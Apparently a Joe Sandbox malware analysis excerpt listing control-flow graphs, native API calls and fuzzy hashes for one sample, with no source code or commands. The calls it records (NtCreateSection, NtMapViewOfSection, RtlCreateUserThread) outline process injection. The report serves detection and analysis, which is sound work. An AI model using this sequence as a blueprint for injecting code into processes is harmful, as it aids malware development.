• Opcode Fuzzy Hash: 550af55b5c33a16d76ad9188aa3b48c23daf6e7e6acb27d056da92f91d001912
• Instruction Fuzzy Hash: 1A51FAB5900245BFEB208F91CC49FAF7BB8FF85710F10416AFA12BA2E5D6759941CB24

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 94 4015ae-4015c4 99 4015c7-4015ed call 401232 94->99 100 4015bb-4015c0 94->100 106 4015f2-4015f7 99->106 107 4015ef 99->107 100->99 109 401925-40192d 106->109 110 4015fd-40160e 106->110 107->106 109->106 115 401932-40195f 109->115 113 401923 110->113 114 401614-40163d 110->114 113->115 114->113 123 401643-40165a NtDuplicateObject 114->123 128 401970 115->128 129 401967-40196c 115->129 123->113 125 401660-401684 NtCreateSection 123->125 126 4016e0-401706 NtCreateSection 125->126 127 401686-4016a7 NtMapViewOfSection 125->127 126->113 131 40170c-401710 126->131 127->126 130 4016a9-4016c5 NtMapViewOfSection 127->130 128->129 132 401973-40197c call 401232 128->132 129->132 130->126 133 4016c7-4016dd 130->133 131->113 134 401716-401737 NtMapViewOfSection 131->134 133->126 134->113 136 40173d-401759 NtMapViewOfSection 134->136 136->113 139 40175f call 401764 136->139
APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016C0
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401701
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401732
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401754
Memory Dump Source
• Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: aad48c6d88222827d76aa7652c6c796d7ddce7428490710ae29ddb02ebf74649
• Instruction ID: d93687337549ecf3b3999b9eee4fb31f76edfbca6074550aabce6ce0329d43fa
• Opcode Fuzzy Hash: aad48c6d88222827d76aa7652c6c796d7ddce7428490710ae29ddb02ebf74649
• Instruction Fuzzy Hash: 3651E9B5900249BFEB208F91CC49FAF7BB8FF85710F10416AF912BA2E5D6749941CB64

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 141 4015b2-4015c4 144 4015c7-4015ed call 401232 141->144 145 4015bb-4015c0 141->145 151 4015f2-4015f7 144->151 152 4015ef 144->152 145->144 154 401925-40192d 151->154 155 4015fd-40160e 151->155 152->151 154->151 160 401932-40195f 154->160 158 401923 155->158 159 401614-40163d 155->159 158->160 159->158 168 401643-40165a NtDuplicateObject 159->168 173 401970 160->173 174 401967-40196c 160->174 168->158 170 401660-401684 NtCreateSection 168->170 171 4016e0-401706 NtCreateSection 170->171 172 401686-4016a7 NtMapViewOfSection 170->172 171->158 176 40170c-401710 171->176 172->171 175 4016a9-4016c5 NtMapViewOfSection 172->175 173->174 177 401973-40197c call 401232 173->177 174->177 175->171 178 4016c7-4016dd 175->178 176->158 179 401716-401737 NtMapViewOfSection 176->179 178->171 179->158 181 40173d-401759 NtMapViewOfSection 179->181 181->158 184 40175f call 401764 181->184
APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016C0
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401701
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401732
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401754
Memory Dump Source
• Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: 8f1b04596c891638e987061b4fd14cd6f2842466c9f73f2235a240237ce973bd
• Instruction ID: e724d2045ade5056ad904edc052e52f28ed36ddcc1604857e4509157ba9d4460
• Opcode Fuzzy Hash: 8f1b04596c891638e987061b4fd14cd6f2842466c9f73f2235a240237ce973bd
• Instruction Fuzzy Hash: 4951F8B5900249BFEB208F91CC48FAF7BB8FF85710F10416AFA11BA2E5D6749941CB24

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 186 4015b5-4015ed call 401232 194 4015f2-4015f7 186->194 195 4015ef 186->195 197 401925-40192d 194->197 198 4015fd-40160e 194->198 195->194 197->194 203 401932-40195f 197->203 201 401923 198->201 202 401614-40163d 198->202 201->203 202->201 211 401643-40165a NtDuplicateObject 202->211 216 401970 203->216 217 401967-40196c 203->217 211->201 213 401660-401684 NtCreateSection 211->213 214 4016e0-401706 NtCreateSection 213->214 215 401686-4016a7 NtMapViewOfSection 213->215 214->201 219 40170c-401710 214->219 215->214 218 4016a9-4016c5 NtMapViewOfSection 215->218 216->217 220 401973-40197c call 401232 216->220 217->220 218->214 221 4016c7-4016dd 218->221 219->201 222 401716-401737 NtMapViewOfSection 219->222 221->214 222->201 224 40173d-401759 NtMapViewOfSection 222->224 224->201 227 40175f call 401764 224->227
APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016C0
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401701
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401732
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401754
Memory Dump Source
• Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: eb3fe8fbd6bccc29ca7bf92f4fff330b19a922bc50cdef00e3920239153ef05c
• Instruction ID: 05886196e08d4e85f5453255f8ae9807988dcabdd8a0f4b981ab3c1fc65c3876
• Opcode Fuzzy Hash: eb3fe8fbd6bccc29ca7bf92f4fff330b19a922bc50cdef00e3920239153ef05c
• Instruction Fuzzy Hash: B551F9B5900249BFEB208F91CC48FAFBBB8FF85710F104169FA11BA2A5D7749945CB24

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 229 4015c9-4015ed call 401232 233 4015f2-4015f7 229->233 234 4015ef 229->234 236 401925-40192d 233->236 237 4015fd-40160e 233->237 234->233 236->233 242 401932-40195f 236->242 240 401923 237->240 241 401614-40163d 237->241 240->242 241->240 250 401643-40165a NtDuplicateObject 241->250 255 401970 242->255 256 401967-40196c 242->256 250->240 252 401660-401684 NtCreateSection 250->252 253 4016e0-401706 NtCreateSection 252->253 254 401686-4016a7 NtMapViewOfSection 252->254 253->240 258 40170c-401710 253->258 254->253 257 4016a9-4016c5 NtMapViewOfSection 254->257 255->256 259 401973-40197c call 401232 255->259 256->259 257->253 260 4016c7-4016dd 257->260 258->240 261 401716-401737 NtMapViewOfSection 258->261 260->253 261->240 263 40173d-401759 NtMapViewOfSection 261->263 263->240 266 40175f call 401764 263->266
APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016C0
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401701
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401732
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401754
Memory Dump Source
• Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: ea96f037bf94ea02d19f6c63c086c7fff38af85363d4889041e369385c3c27e7
• Instruction ID: ef1b3f988cfa4bb2a22b23b9c3e523de7926394e29e71cf52b4e6543f7eacfea
• Opcode Fuzzy Hash: ea96f037bf94ea02d19f6c63c086c7fff38af85363d4889041e369385c3c27e7
• Instruction Fuzzy Hash: 345117B5900249BFEB208F91CC49FEFBBB8FF85B10F100159FA11AA2A5D7749941CB24

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 268 4015c6-4015ed call 401232 275 4015f2-4015f7 268->275 276 4015ef 268->276 278 401925-40192d 275->278 279 4015fd-40160e 275->279 276->275 278->275 284 401932-40195f 278->284 282 401923 279->282 283 401614-40163d 279->283 282->284 283->282 292 401643-40165a NtDuplicateObject 283->292 297 401970 284->297 298 401967-40196c 284->298 292->282 294 401660-401684 NtCreateSection 292->294 295 4016e0-401706 NtCreateSection 294->295 296 401686-4016a7 NtMapViewOfSection 294->296 295->282 300 40170c-401710 295->300 296->295 299 4016a9-4016c5 NtMapViewOfSection 296->299 297->298 301 401973-40197c call 401232 297->301 298->301 299->295 302 4016c7-4016dd 299->302 300->282 303 401716-401737 NtMapViewOfSection 300->303 302->295 303->282 305 40173d-401759 NtMapViewOfSection 303->305 305->282 308 40175f call 401764 305->308
APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016C0
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401701
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401732
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401754
Memory Dump Source
• Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                      • Opcode ID: a2f322119c05af17b4901faaf714ff9b7bf9a3c80b83fc2f3d91b8ffa7827192
                                                                                                                                      • Instruction ID: 60ad09eed729309f4eedb2a363b86104ae123941a7c17f9052a08614a1eb4cc1
                                                                                                                                      • Opcode Fuzzy Hash: a2f322119c05af17b4901faaf714ff9b7bf9a3c80b83fc2f3d91b8ffa7827192
                                                                                                                                      • Instruction Fuzzy Hash: 8051E9B5900249BFEB208F91CC49FEFBBB8FF85B10F104159F911BA2A5D6749945CB24

Control-flow Graph (legend in the original rendering: Executed / Not Executed)
control_flow_graph 310 402600 311 402601-402604 310->311 312 40273a 311->312 313 40260a-402660 NtOpenKey 311->313 314 402743-402787 call 401232 312->314 323 402666-40267d 313->323 324 40272c-402735 313->324 330 402683-4026a5 323->330 331 402726-402729 NtClose 323->331 324->311 337 402720 330->337 338 4026a7-4026ab 330->338 331->324 337->331 338->337 339 4026ad-4026b6 338->339 340 4026b8-4026bb 339->340 340->337 341 4026bd-4026d5 NtEnumerateKey 340->341 342 4026d7-4026fe NtEnumerateKey 341->342 343 40271d-40271e 341->343 345 402700-402704 342->345 346 402717 342->346 343->340 345->346 347 402706-402715 call 401cef 345->347 346->343 347->346 350 40273c 347->350 350->314
APIs
• NtOpenKey.NTDLL(F9F9F7E5,00000009,F9F9F7CD), ref: 00402658
• NtEnumerateKey.NTDLL(?,?,00000000,00000000,00000000,00000000), ref: 004026CB
• NtEnumerateKey.NTDLL(?,?,00000000,?,00000002,00000002), ref: 004026F6
• NtClose.NTDLL(?), ref: 00402729
Memory Dump Source
• Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
Similarity
• API ID: Enumerate$CloseOpen
• String ID:
• API String ID: 4196332011-0
• Opcode ID: bb34d06be76bb7b501c8afc06c01172f7ca9cf9edd1b1584a752fe27c3b853fc
• Instruction ID: 6c5ac5058aa2b5087ec3ea8b6a8dc2ca808718e1067c45ee26b27d55205dc1df
• Opcode Fuzzy Hash: bb34d06be76bb7b501c8afc06c01172f7ca9cf9edd1b1584a752fe27c3b853fc
• Instruction Fuzzy Hash: E9414C7190020AEFDF119F90CA8DFAEBB75FF44704F208066E6017A1D1D7B85A45DB66

Control-flow Graph (legend in the original rendering: Executed / Not Executed)
control_flow_graph 351 4023b0-4023b8 352 4023b9-4023cc 351->352 356 4023db-4023fb call 401232 352->356 364 4023a1-4023ad 356->364 365 4023fd-402415 356->365 366 402450-402456 365->366 367 402417-402419 365->367 370 402459-402467 366->370 368 4023da 367->368 369 40241b-40241c 367->369 368->356 369->370 372 40241e 369->372 371 402479 370->371 373 4024aa 371->373 374 40247b-40248b 371->374 375 402420-402423 372->375 376 402439-40243e 372->376 377 4024ac-4024df 373->377 378 40248d-40249b 374->378 379 40249f-4024b6 374->379 380 402440-40244c 375->380 381 402425 375->381 376->371 376->380 392 4024e2-4024f6 call 401232 call 40250f 377->392 393 4024d8-4024db 377->393 379->377 380->366 381->375 384 402427-40242b 381->384 384->352 387 40242d-402434 384->387 387->376 398 4024f8-4024ff 392->398 399 40255a-402577 392->399 393->392 400 402501-40250d 398->400 401 402578-40260e 398->401 399->401 415 402614-402660 NtOpenKey 401->415 418 402666-40267d 415->418 419 40272c-402735 415->419 422 402683-4026a5 418->422 423 402726-402729 NtClose 418->423 425 40273a 419->425 426 40260a-40260f 419->426 433 402720 422->433 434 4026a7-4026ab 422->434 423->419 427 402743-402787 call 401232 425->427 426->415 433->423 434->433 436 4026ad-4026b6 434->436 438 4026b8-4026bb 436->438 438->433 440 4026bd-4026d5 NtEnumerateKey 438->440 442 4026d7-4026fe NtEnumerateKey 440->442 443 40271d-40271e 440->443 447 402700-402704 442->447 448 402717 442->448 443->438 447->448 450 402706-402715 call 401cef 447->450 448->443 450->448 454 40273c 450->454 454->427
Memory Dump Source
• Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6a00a9c7d13a07c51dd77bc3c2eb113ae7025efeb939adfbc7958f87c2f127ae
• Instruction ID: a32d40ac3b9c7093630245df7894846315545a5dc73766260dcb213d7d2a491e
• Opcode Fuzzy Hash: 6a00a9c7d13a07c51dd77bc3c2eb113ae7025efeb939adfbc7958f87c2f127ae
• Instruction Fuzzy Hash: 22B1D431548285AFDB128B708E5DBAA7F70AF01300F1881AFE9456B1D3D3BC9906D76A

Control-flow Graph (legend in the original rendering: Executed / Not Executed)
control_flow_graph 455 40250f 456 402510-402513 455->456 457 402515-40251b 456->457 458 402526-40260e call 402600 456->458 463 402521-402524 457->463 464 40273c 457->464 490 402614-402660 NtOpenKey 458->490 463->456 466 402743-402787 call 401232 464->466 493 402666-40267d 490->493 494 40272c-402735 490->494 497 402683-4026a5 493->497 498 402726-402729 NtClose 493->498 500 40273a 494->500 501 40260a-40260f 494->501 504 402720 497->504 505 4026a7-4026ab 497->505 498->494 500->466 501->490 504->498 505->504 506 4026ad-4026b6 505->506 507 4026b8-4026bb 506->507 507->504 508 4026bd-4026d5 NtEnumerateKey 507->508 509 4026d7-4026fe NtEnumerateKey 508->509 510 40271d-40271e 508->510 512 402700-402704 509->512 513 402717 509->513 510->507 512->513 514 402706-402715 call 401cef 512->514 513->510 514->464 514->513
APIs
• NtOpenKey.NTDLL(F9F9F7E5,00000009,F9F9F7CD), ref: 00402658
• NtEnumerateKey.NTDLL(?,?,00000000,00000000,00000000,00000000), ref: 004026CB
• NtEnumerateKey.NTDLL(?,?,00000000,?,00000002,00000002), ref: 004026F6
• NtClose.NTDLL(?), ref: 00402729
Memory Dump Source
• Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
Similarity
• API ID: Enumerate$CloseOpen
• String ID:
• API String ID: 4196332011-0
• Opcode ID: 42da9b558526dab9f9f7d6e1865eeab63f52cf10c2a35edcbf27946a2bd194e1
• Instruction ID: af6aad5066364b183d814378913c990334d1b5a1068601ef9d2b9d113d753dd3
• Opcode Fuzzy Hash: 42da9b558526dab9f9f7d6e1865eeab63f52cf10c2a35edcbf27946a2bd194e1
• Instruction Fuzzy Hash: C4817F304093856FDB128B608E6DBAABF70BF01304F18C1AFD8456A5D3D7B89949D76A

Control-flow Graph (legend in the original rendering: Executed / Not Executed)
control_flow_graph 517 402595-40260e 525 402614-402660 NtOpenKey 517->525 528 402666-40267d 525->528 529 40272c-402735 525->529 532 402683-4026a5 528->532 533 402726-402729 NtClose 528->533 535 40273a 529->535 536 40260a-40260f 529->536 543 402720 532->543 544 4026a7-4026ab 532->544 533->529 537 402743-402787 call 401232 535->537 536->525 543->533 544->543 546 4026ad-4026b6 544->546 548 4026b8-4026bb 546->548 548->543 550 4026bd-4026d5 NtEnumerateKey 548->550 552 4026d7-4026fe NtEnumerateKey 550->552 553 40271d-40271e 550->553 557 402700-402704 552->557 558 402717 552->558 553->548 557->558 560 402706-402715 call 401cef 557->560 558->553 560->558 564 40273c 560->564 564->537
APIs
• NtOpenKey.NTDLL(F9F9F7E5,00000009,F9F9F7CD), ref: 00402658
• NtEnumerateKey.NTDLL(?,?,00000000,00000000,00000000,00000000), ref: 004026CB
• NtEnumerateKey.NTDLL(?,?,00000000,?,00000002,00000002), ref: 004026F6
• NtClose.NTDLL(?), ref: 00402729
Memory Dump Source
• Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
Similarity
• API ID: Enumerate$CloseOpen
• String ID:
• API String ID: 4196332011-0
• Opcode ID: 78186842e91a73d37e52b9aadd370abdad8b8cb84815d1aad615ebabb8bd498c
• Instruction ID: 3a269d0cca06ea8c5e40adcf94021f09073695a508613ac771173a695d32f02e
• Opcode Fuzzy Hash: 78186842e91a73d37e52b9aadd370abdad8b8cb84815d1aad615ebabb8bd498c
• Instruction Fuzzy Hash: BA517130809385AFDB12CFA0CD59BAABF74BF01300F18C59EE9447A1D2D7B89949DB65

Control-flow Graph (legend in the original rendering: Executed / Not Executed)
control_flow_graph 565 402ffc-403020 566 403026-40303e 565->566 567 40313f-403144 565->567 566->567 568 403044-403055 566->568 569 403057-403060 568->569 570 403065-403073 569->570 570->570 571 403075-40307c 570->571 572 40309e-4030a5 571->572 573 40307e-40309d 571->573 574 4030c7-4030ca 572->574 575 4030a7-4030c6 572->575 573->572 576 4030d3 574->576 577 4030cc-4030cf 574->577 575->574 576->569 579 4030d5-4030da 576->579 577->576 578 4030d1 577->578 578->579 579->567 580 4030dc-4030df 579->580 580->567 581 4030e1-40313c RtlCreateUserThread NtTerminateProcess 580->581 581->567
APIs
Memory Dump Source
• Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
Similarity
• API ID: CreateProcessTerminateThreadUser
• String ID:
• API String ID: 1921587553-0
• Opcode ID: 9fc07a47e82ee84ddc63006ac5df85d4bbf6348d323fe261367906c717befcc8
• Instruction ID: 3fe51a1ca5390821cec685e94d0c6465df1e8e695ad90730d317ab7b65ede5da
• Opcode Fuzzy Hash: 9fc07a47e82ee84ddc63006ac5df85d4bbf6348d323fe261367906c717befcc8
• Instruction Fuzzy Hash: 83414732618E0C4FD778EE6CA84967377D5E798311B1643AAD809D3398EE30D85187C6

Control-flow Graph (legend in the original rendering: Executed / Not Executed)
control_flow_graph 582 40197f-4019e3 call 401232 Sleep call 4014a5 596 4019f2-401a37 call 401232 582->596 597 4019e5-4019ed call 401597 582->597 597->596
APIs
• Sleep.KERNELBASE(00001388), ref: 004019CE
  • Part of subcall function 00401597: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
  • Part of subcall function 00401597: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
  • Part of subcall function 00401597: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
Memory Dump Source
• Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0
• Opcode ID: 679fef2a4a3561db55f23cc84b4bc5a750ce9d05a361d1e252e4cc0622c4667b
• Instruction ID: c811fe4ff13ed005d7b90e820295dbd79effc60c5395b5f7653e819f54dd3e9f
• Opcode Fuzzy Hash: 679fef2a4a3561db55f23cc84b4bc5a750ce9d05a361d1e252e4cc0622c4667b
• Instruction Fuzzy Hash: C30180B2709204FAD7006A949E51E7A3668AB40751F704177BA43780F5D57C8913FA6F

Control-flow Graph (legend in the original rendering: Executed / Not Executed)
control_flow_graph 611 40199b-4019e3 call 401232 Sleep call 4014a5 625 4019f2-401a37 call 401232 611->625 626 4019e5-4019ed call 401597 611->626 626->625
APIs
• Sleep.KERNELBASE(00001388), ref: 004019CE
  • Part of subcall function 00401597: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401652
  • Part of subcall function 00401597: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040167F
  • Part of subcall function 00401597: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016A2
Memory Dump Source
• Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0
                                                                                                                                      • Opcode ID: 6453cb712f97e6c3e73584405a9ab922ca49c2d0657cff5b7762b64cca9ea8ac
                                                                                                                                      • Instruction ID: df1ff986622998e63959179eb8c927f0d3cda0a7536f4bc564826170f3d4db9c
                                                                                                                                      • Opcode Fuzzy Hash: 6453cb712f97e6c3e73584405a9ab922ca49c2d0657cff5b7762b64cca9ea8ac
                                                                                                                                      • Instruction Fuzzy Hash: 35015AB2709245EADB009A849EA1FBA3265AB44711F708177BA43B80F5D53C8513BE6F

Control-flow Graph
• Blocks: 40198d-4019e3 (call 401232, Sleep, call 4014a5); 4019e5-4019ed (call 401597); 4019f2-401a37 (call 401232)
• Edges: 40198d-4019e3 -> 4019f2-401a37; 40198d-4019e3 -> 4019e5-4019ed; 4019e5-4019ed -> 4019f2-401a37
APIs
• Sleep.KERNELBASE(00001388), ref: 004019CE
